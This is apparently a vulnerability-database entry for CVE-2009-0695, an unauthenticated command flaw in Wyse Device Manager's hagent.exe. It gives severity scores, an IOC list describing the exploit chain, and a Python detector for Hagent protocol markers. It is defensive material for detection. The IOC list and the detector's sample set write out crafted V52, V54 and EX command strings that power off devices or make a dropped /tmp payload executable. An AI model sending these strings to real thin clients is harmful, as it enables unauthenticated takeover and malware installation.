cbcvebase.
CVE-2009-0695
published 2012-06-19


Priority: P274 high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 68.89% (99.3rd percentile)
hagent.exe in Wyse Device Manager (WDM) 4.7.x does not require authentication for commands, which allows remote attackers to obtain management access via a crafted query, as demonstrated by a V52 query that triggers a power-off action.

Affected

3 ranges (the version range and fixed-in values were not present in the extracted record)

Vendor | Product | Version range | Fixed in
dell | wyse_device_manager | |
dell | wyse_device_manager | |
dell | wyse_device_manager | |

Detection & IOCs (extracted from sources)

process: hagent.exe
command: &V52&CI=3|MAC=<mac>|<rhost>|RB=0|MT=3||HS=<rhost>|PO=<rport>|SPO=0|
command: &V54&CI=3|MAC=<fakemac>|IP=<rhost>MT=3|HS=<fakerapport>|PO=<wdmserver_port>|
command: |EX \x0f//bin//chmod\xfc+x\xfc//tmp//<malfile>\x0f|
  • Detect unauthenticated V52 query packets to hagent.exe on TCP/80 — a V52 query with RB=0 and MT=3 fields triggers a remote power-off action with no authentication required.
  • Alert on raw TCP connections to port 80 of Wyse thin-client hosts containing the string '&V52&' or '&V54&' in the request body, which are exploit-specific Hagent protocol command markers.
  • Monitor for the Hagent protocol response '&00' from a Wyse device, which indicates successful command execution (e.g., power-off) by an attacker.
  • Detect outbound FTP connections (TCP/21) from Wyse thin-client hosts to unexpected external IPs following an inbound V54 Hagent command — this indicates the fake-server exploit stage where the target downloads a malicious executable.
  • Alert on Wyse Linux thin-clients executing binaries from /tmp/ (e.g., random-named .bin files) — the exploit drops and executes a payload at //tmp/<random>.bin.
  • Alert on Wyse Windows XPe thin-clients executing random-named .exe files from C:\ root — the exploit drops and executes a payload at C:\<random>.exe.
  • Detect Hagent protocol HTTP requests containing V01, V55, or POST verbs with '&UP0|&SI=1|UR=9' in the body — these are the fake-server update command sequences used to push malicious payloads.
  • The exploit targets Wyse Device Manager (WDM) 4.7.x specifically; the Hagent service listens on TCP/80 by default, but the HTTP server port used in the fake-server variant is dynamically assigned and may vary.
  • The FTP server used to deliver the payload MUST run on port 21; the exploit explicitly checks and aborts if SRVPORT is not 21.
  • The MAC address field in the crafted Hagent query is randomly generated per session, so MAC-based IOCs are not reliable for detection.
  • The dropped payload filename is randomized (4–11 alphanumeric characters) on each exploit run; static filename-based detection will not be effective.
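As an added example (not code from this record's sources, from the exploit module they describe, or from Dell/Wyse), the following Python applies the markers above to sample request and response bodies: it parses the leading `&Vnn&` verb and the pipe-separated fields, flags a V52 query carrying RB=0 and MT=3 as the power-off trigger, a V54 query as the fake-server redirect (reporting the HS host and PO port it points at), the `&00` acknowledgement, the EX stage that chmods a file under /tmp, and the `&UP0|&SI=1|UR=9` update marker. Every payload in `SAMPLES` is constructed for the example; the MAC addresses, hosts, ports and the `kq7xz.bin` filename are made up, in line with the note that the real MAC and filename are randomized per run.

```python
"""Flag Hagent protocol command markers from the IOC list in raw TCP/HTTP bodies.

Added example for this record; it is not code from the record's sources, from
the exploit module, or from Dell/Wyse. Every payload in SAMPLES is constructed
for the example (MACs, hosts, ports and filenames are made up), not captured traffic.
"""
import re

# A Hagent query starts with '&<verb>&'; the rest is a '|'-separated field list.
VERB_RE = re.compile(r"^&(V\d{2})&(.*)$", re.S)
# The EX command wraps the command line in \x0f and separates arguments with \xfc.
EX_RE = re.compile(r"\|EX \x0f([^\x0f]*)\x0f\|")
# Update sequence the fake-server stage pushes alongside V01/V55/POST requests.
UPDATE_MARKER = "&UP0|&SI=1|UR=9"


def parse_fields(body):
    """Split 'CI=3|MAC=..|host|RB=0|' into ({KEY: value}, [bare tokens])."""
    fields, bare = {}, []
    for tok in body.split("|"):
        if not tok:
            continue                      # '||' yields empty tokens; skip them
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields[key] = value
        else:
            bare.append(tok)              # e.g. the target host in a V52 query
    return fields, bare


def classify(payload):
    """Return the IOC labels matched by one request or response body ([] if none)."""
    if isinstance(payload, bytes):
        payload = payload.decode("latin-1")   # keeps \x0f and \xfc as single chars
    hits = []

    m = VERB_RE.match(payload)
    if m:
        verb, fields_part = m.group(1), m.group(2)
        fields, _ = parse_fields(fields_part)
        if verb == "V52":
            hits.append("V52 query (unauthenticated Hagent command)")
            if fields.get("RB") == "0" and fields.get("MT") == "3":
                hits.append("V52 power-off (RB=0, MT=3)")
        elif verb == "V54":
            hits.append("V54 redirect to server %s:%s" % (fields.get("HS"), fields.get("PO")))

    if payload.startswith("&00"):
        hits.append("Hagent success response (&00)")

    ex = EX_RE.search(payload)
    if ex:
        # Collapse the doubled slashes the exploit uses (//bin//chmod -> /bin/chmod).
        args = [re.sub(r"/+", "/", a) for a in ex.group(1).split("\xfc")]
        hits.append("EX remote command: " + " ".join(args))
        if args and args[0].endswith("/chmod") and any(a.startswith("/tmp/") for a in args):
            hits.append("payload made executable under /tmp/")

    if UPDATE_MARKER in payload:
        hits.append("fake-server update sequence (%s)" % UPDATE_MARKER)
    return hits


def scan(payloads):
    """Return [(index, hits)] for every payload that matched at least one IOC."""
    results = []
    for i, p in enumerate(payloads):
        hits = classify(p)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample bodies, one per IOC pattern plus a benign control.
SAMPLES = [
    "&V52&CI=3|MAC=00005E005301|192.0.2.10|RB=0|MT=3||HS=192.0.2.10|PO=80|SPO=0|",
    "&00",
    "&V54&CI=3|MAC=00005E005302|IP=192.0.2.10|MT=3|HS=198.51.100.7|PO=8080|",
    "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//kq7xz.bin\x0f|",
    "&V52&CI=3|MAC=00005E005303|192.0.2.11|RB=1|MT=1||HS=192.0.2.11|PO=80|SPO=0|",
    "GET /index.html HTTP/1.0",
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLES):
        print(idx, labels)
```

Run against a live capture, feed `classify()` each reassembled TCP/80 body (as `bytes`) rather than individual segments, since the `\x0f ... \x0f` envelope of the EX stage can straddle a segment boundary; the bare V52 match alone is worth an alert because the protocol accepts it without authentication.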